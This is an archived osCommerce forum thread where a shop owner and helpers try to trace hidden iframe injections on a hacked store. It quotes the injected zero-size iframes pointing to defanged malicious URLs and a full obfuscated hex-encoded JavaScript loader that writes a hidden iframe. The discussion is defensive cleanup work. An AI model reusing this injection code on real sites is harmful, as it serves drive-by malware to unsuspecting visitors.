Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Iframe Trojan Present


fengshui37

Recommended Posts

My client was recently informed by AUScert that her website was hosting malicious content.....specifically iframes that pointed to links as follows (Here and below, I have masked and incorrectly formated them so these are NOT the exact links):

 

>> hxxp://msn-analytics. net/count.php?o=2

>> hxxp://pinoc. org/count.php?o=2

>> hxxp://wsxhost. net/count.php?o=2

 

were being inserted into the html coding for many pages.

 

I believe we fixed the problem that allowed it to get in there in first place and with hours of work, removed all instances of the code and finally removed a couple of php scripts that had been installed on the server which we believe were allowing the unwanted access.

 

The only problem is that the iframe code is STILL present in source code for the catalog site (oscommerce). I downloaded EVERY single file associated with the catalog site and searched it for instances of "pinoc" and "wsxhost" and also decimal, hexadecimal, and binary ASCII representations of those letters and found no instances of it in the oscommerce files BUT it is still showing up in source code.

 

Has anyone else experienced this and if so, how or where or in what file or where in the mySQL data base did you need to go to remove the code such that it was no longer present in the source code for the oscommerce site. For that matter the code is inserted in very first line of the source i.e:

 

<iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://wsxhost. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">............

 

Thanks,

- Fengshui37

Link to comment
Share on other sites

You probably won't find it searching for the actual text injected into the page.

 

They normally use obfuscated PHP code to do that.

 

Many hijackers use the PHP function base64_decode for that.

 

Search for the string base64 in the catalog files.

 

If you want you can post any suspicious looking results.

 

It's usually not too difficult to spot "malicious" code.

;)

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Check the includes /languages / folder also

htaccess,

your images folders

which files do you see the iframe present in the source code?

Check you header.php + footer.php a;so

 

I downloaded it all including the htaccess files and image folders etc onto my hard drive.....and essentially searched for "pinoc" which is definitely a string that is present

in the source code for the "store" (first line before the <html> tag). Since the "webpage" is all script driven in oscommerce, I am actually seeing it when

selecting the "view source code" option from either right click or browser drop down menu. I've been trying to find where it has been placed in one of the scripts

that displays the store. I found every instance elsewhere on the server outside of the catalog folder (446 of them) and removed them and also fixed what I think

was the original loophole that allowed the doggone thing to be "installed". So far that is holding but still can't find out where they installed it in the catalog or how they did it.

 

Also searched for string "base64". None found.

Link to comment
Share on other sites

You probably won't find it searching for the actual text injected into the page.

 

They normally use obfuscated PHP code to do that.

 

Many hijackers use the PHP function base64_decode for that.

 

Search for the string base64 in the catalog files.

 

If you want you can post any suspicious looking results.

 

It's usually not too difficult to spot "malicious" code.

;)

 

I did the search for the string base64 and also threw in "iframe" and still no instances found. Its coming from somewhere because when I load the page and view source its there but its apparently NOT in any of the catalog files. Unless they've hidden it somehow in one of those core.#### files (I have no idea what their function is).

 

Any other ideas?

 

- Fengshui37

***********************************

...never bugs, my programs do however have occasional undisclosed random features...

Link to comment
Share on other sites

i cannot look as my virus checker will not allow me to, check you images folder for anything you do not recgonisealso chack you folder permissions no higher than 755

Nic

Source code contains:

 

<script>function c1200847515n490fdfacb8138(n490fdfacb8927){ return (parseInt(n490fdfacb8927,16));}

function n490fdfacba0f4(n490fdfacba8f0){ function n490fdfacbb4ce(){var n490fdfacbb8c0=2;return n490fdfacbb8c0;}

var n490fdfacbace0='';n490fdfacbbcbd=String.fromCharCode;for(n490fdfacbb0dc=0;n490fdfacbb0dc<n490fdfacba8f0.length;

n490fdfacbb0dc+=n490fdfacbb4ce()){ n490fdfacbace0+=(n490fdfacbbcbd(c1200847515n490fdfacb8138(n490fdfacba8f0.

substr(n490fdfacbb0dc,n490fdfacbb4ce()))));}return n490fdfacbace0;} var xfa='';var n490fdfacbc0ba='3C7'+xfa+'3637'+

xfa+'2697'+xfa+'07'+xfa+'43E667'+xfa+'56E637'+xfa+

'4696F6E20636865636B5F636F6E7'+xfa+'4656E7'+xfa+'428297'+xfa+'B7'+xfa+'6617'+xfa+'220693D303B7'+

xfa+'7'+xfa+'68696C6528646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+'4456C656D656E7'+xfa+

'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+xfa+'292E6C656E67'+xfa+

'7'+xfa+'468297'+xfa+'B7'+xfa+'6617'+xfa+'220656C3D646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+

'4456C656D656E7'+xfa+'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+

xfa+'295B695D3B6966282028656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E64697'+xfa+'37'+xfa+'06C617'+xfa+

'93D3D27'+xfa+'6E6F6E6527'+xfa+'207'+xfa+'C7'+xfa+'C20656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E7'+xfa+'6697'+

xfa+'36962696C697'+xfa+'47'+xfa+'9203D3D27'+xfa+'68696464656E27'+xfa+'207'+xfa+'C7'+xfa+'C2028656C2E7'+xfa+

'7'+xfa+'69647'+xfa+'4683C3520262620656C2E68656967'+xfa+'687'+xfa+'43C35292920262620656C2E6E616D65213D27'+

xfa+'633127'+xfa+'297'+xfa+'B656C2E7'+xfa+'0617'+xfa+'2656E7'+xfa+'44E6F64652E7'+xfa+'2656D6F7'+xfa+

'6654368696C6428656C293B7'+xfa+'D656C7'+xfa+'36520692B2B3B7'+xfa+'D7'+xfa+'D636865636B5F636F6E7'+xfa+

'4656E7'+xfa+'428293B0A696628216D7'+xfa+'96961297'+xfa+'B646F637'+xfa+'56D656E7'+xfa+'42E7'+xfa+'7'+xfa+

'7'+xfa+'2697'+xfa+'465287'+xfa+'56E657'+xfa+'363617'+xfa+'065282027'+xfa+'2533632536392536362537'+xfa+

'3225363125366425363525323025366525363125366425363525336425363325333125323025

37'+xfa+'332537'+xfa+

'32253633253364253237'+xfa+'2536382537'+xfa+'342537'+xfa+'342537'+xfa+'30253361253266253266253337'+

xfa+'2533392532652533312533332533322532652533322533312533312532652533332533302532

6625363825363525363

92532662533662537'+xfa+'34253364253332253334253237'+xfa+'2532302537'+xfa+'37'+xfa+'2536392536342537'+xfa+

'34253638253364253337'+xfa+'253330253331253230253638253635253639253637'+xfa+'2536382537'+xfa+'342533642533

352533362533362532302537'+xfa+'332537'+xfa+'342537'+xfa+'39253663253635253364253237'+xfa+'2536342536392537'

+xfa+'332537'+xfa+'302536632536312537'+xfa+'39253361253230253665253666253665253635253237'+xfa+'2533652533632

532662536392536362537'+xfa+'3225363125366425363525336527'+xfa+'29293B7'+xfa+'D7'+xfa+'6617'+xfa+'2206D7'+xfa+

'969613D7'+xfa+'47'+xfa+'27'+xfa+'5653B3C2F7'+xfa+'3637'+xfa+'2697'+xfa+'07'+xfa+'43E';document.write(n490fdfacba0f

4(n490fdfacbc0ba));</script>

Link to comment
Share on other sites

whats the URL?

 

URL for the site I'm talking about is www.fengshuicuresandcrystals.com

 

- Fengshui37

 

**********************************

...never bugs, my programs do however have occasional undisclosed random features...

Link to comment
Share on other sites

URL for the site I'm talking about is www.fengshuicuresandcrystals.com

 

- Fengshui37

 

**********************************

...never bugs, my programs do however have occasional undisclosed random features...

It gets inserted into the page source before this:

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

So what's in your /catalog/index.php before that code?

:unsure:

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Hi, I just tried to go to the mentioned site and sure enough my avast detected it and said it was called - HTML:Iframe-gen which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things.

Link to comment
Share on other sites

It gets inserted into the page source before this:

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

So what's in your /catalog/index.php before that code?

:unsure:

 

Here is the code up to and slightly after that:

 

<?php

/*

$Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

 

require('includes/application_top.php');

 

// the following cPath references come from application_top.php

$category_depth = 'top';

if (isset($cPath) && tep_not_null($cPath)) {

$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");

$cateqories_products = tep_db_fetch_array($categories_products_query);

if ($cateqories_products['total'] > 0) {

$category_depth = 'products'; // display products

} else {

$category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");

$category_parent = tep_db_fetch_array($category_parent_query);

if ($category_parent['total'] > 0) {

$category_depth = 'nested'; // navigate through the categories

} else {

$category_depth = 'products'; // category has no products, but display the 'no products' message

}

}

}

 

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

?>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS; ?>>

*****************************************

If this is different from what people with "clean" sites have, let me know what is different because I am not seeing the offending code inserted here in this file.

 

- Fengshui37

-----------------------------

...never bugs, my programs do however have occasional undisclosed random features...

Link to comment
Share on other sites

Look in here:

 

require('includes/application_top.php');

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Hi, I just tried to go to the mentioned site and sure enough my avast detected it and said it was called - HTML:Iframe-gen which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things.

 

I'm betting that if your avast detected it, it also blocked it from causing any problems. I've got this thing 99 percent removed from the server for actually 3 different web sites....the only part I haven't figured out yet is the catalog i.e. where is it residing/hiding????

-----------------------------

 

...never bugs, my programs do however have occasional undisclosed random features...

Link to comment
Share on other sites

Another thought....

 

Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Look in here:

 

require('includes/application_top.php');

 

Nothing jumps out at me here either....so far as I can tell its OK...but I've got a version from July I can run a comparison on I suppose. Too many files to do this on one by one with the (actually superior) text editor I'm using....

----------------------------------------------

...never bugs, my programs do however have occasional undisclosed random features...

Link to comment
Share on other sites

^--- My last post ---^

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Another thought....

 

Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all.

 

Huh? The store isn't being run in an iframe. The catalog is set up as its own web page and separate from the other 3 sites that also have files in same server/public_html (root) folder. The catalog i.e. store is running oscommerce software as written and distributed and not using anything else from elsewhere on the server.

Link to comment
Share on other sites

	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN"
		"http://www.w3.org/TR/REC-html40/frameset.dtd">
<html>
<head>

<title>Feng Shui Cures & Crystals</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Our shop is the only dedicated Feng Shui Cures & Crystals Shop in Australia run by experts.">
<meta name="keywords" content="feng shui, fengshui, crystals, cures">

</head>

<frameset rows="0,*" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0"> 
  <frame src="frame.htm" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0">
  <frame src="http://www.fengshuinetwork.net/catalog" scrolling=yes>
</frameset>
<noframes><body bgcolor="#FFFFFF">

</body></noframes>

</html>

If I access the root folder, this is the source.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

OK.

 

It's not an iframe.

:lol:

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Source code contains:

 

<script>function c1200847515n490fdfacb8138(n490fdfacb8927){ return (parseInt(n490fdfacb8927,16));}

function n490fdfacba0f4(n490fdfacba8f0){ function n490fdfacbb4ce(){var n490fdfacbb8c0=2;return n490fdfacbb8c0;}

var n490fdfacbace0='';n490fdfacbbcbd=String.fromCharCode;for(n490fdfacbb0dc=0;n490fdfacbb0dc<n490fdfacba8f0.length;

n490fdfacbb0dc+=n490fdfacbb4ce()){ n490fdfacbace0+=(n490fdfacbbcbd(c1200847515n490fdfacb8138(n490fdfacba8f0.

substr(n490fdfacbb0dc,n490fdfacbb4ce()))));}return n490fdfacbace0;} var xfa='';var n490fdfacbc0ba='3C7'+xfa+'3637'+

xfa+'2697'+xfa+'07'+xfa+'43E667'+xfa+'56E637'+xfa+

'4696F6E20636865636B5F636F6E7'+xfa+'4656E7'+xfa+'428297'+xfa+'B7'+xfa+'6617'+xfa+'220693D303B7'+

xfa+'7'+xfa+'68696C6528646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+'4456C656D656E7'+xfa+

'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+xfa+'292E6C656E67'+xfa+

'7'+xfa+'468297'+xfa+'B7'+xfa+'6617'+xfa+'220656C3D646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+

'4456C656D656E7'+xfa+'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+

xfa+'295B695D3B6966282028656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E64697'+xfa+'37'+xfa+'06C617'+xfa+

'93D3D27'+xfa+'6E6F6E6527'+xfa+'207'+xfa+'C7'+xfa+'C20656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E7'+xfa+'6697'+

xfa+'36962696C697'+xfa+'47'+xfa+'9203D3D27'+xfa+'68696464656E27'+xfa+'207'+xfa+'C7'+xfa+'C2028656C2E7'+xfa+

'7'+xfa+'69647'+xfa+'4683C3520262620656C2E68656967'+xfa+'687'+xfa+'43C35292920262620656C2E6E616D65213D27'+

xfa+'633127'+xfa+'297'+xfa+'B656C2E7'+xfa+'0617'+xfa+'2656E7'+xfa+'44E6F64652E7'+xfa+'2656D6F7'+xfa+

'6654368696C6428656C293B7'+xfa+'D656C7'+xfa+'36520692B2B3B7'+xfa+'D7'+xfa+'D636865636B5F636F6E7'+xfa+

'4656E7'+xfa+'428293B0A696628216D7'+xfa+'96961297'+xfa+'B646F637'+xfa+'56D656E7'+xfa+'42E7'+xfa+'7'+xfa+

'7'+xfa+'2697'+xfa+'465287'+xfa+'56E657'+xfa+'363617'+xfa+'065282027'+xfa+'2533632536392536362537'+xfa+

'3225363125366425363525323025366525363125366425363525336425363325333125323025

37'+xfa+'332537'+xfa+

'32253633253364253237'+xfa+'2536382537'+xfa+'342537'+xfa+'342537'+xfa+'30253361253266253266253337'+

xfa+'2533392532652533312533332533322532652533322533312533312532652533332533302532

6625363825363525363

92532662533662537'+xfa+'34253364253332253334253237'+xfa+'2532302537'+xfa+'37'+xfa+'2536392536342537'+xfa+

'34253638253364253337'+xfa+'253330253331253230253638253635253639253637'+xfa+'2536382537'+xfa+'342533642533

352533362533362532302537'+xfa+'332537'+xfa+'342537'+xfa+'39253663253635253364253237'+xfa+'2536342536392537'

+xfa+'332537'+xfa+'302536632536312537'+xfa+'39253361253230253665253666253665253635253237'+xfa+'2533652533632

532662536392536362537'+xfa+'3225363125366425363525336527'+xfa+'29293B7'+xfa+'D7'+xfa+'6617'+xfa+'2206D7'+xfa+

'969613D7'+xfa+'47'+xfa+'27'+xfa+'5653B3C2F7'+xfa+'3637'+xfa+'2697'+xfa+'07'+xfa+'43E';document.write(n490fdfacba0f

4(n490fdfacbc0ba));</script>

 

Baddog, not sure what this was....is this the source code I'm looking to remove i.e. search for this in all the catalog files?

 

I've fixed/removed this thing from alot (447) of files in other folders and so far its staying clean after I found and removed a couple of php files that my Norton AV identified as containing Hacktool and PHPBackdoor repectively....and changed the permissions hopefully so they can't re-infect us. They were located in images and root folders on the server. The only place I can't find (or find out where they've hidden their code) is in the catalog (oscommerce) files.

 

Thanks to everyone for all your help so far....great ideas but so far I haven't been able to find the culprit that is lingering in the OSC site.

 

- fengshui37

-------------------------------------------------------------

...never bugs, my programs do however have occasional undisclosed random features...

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...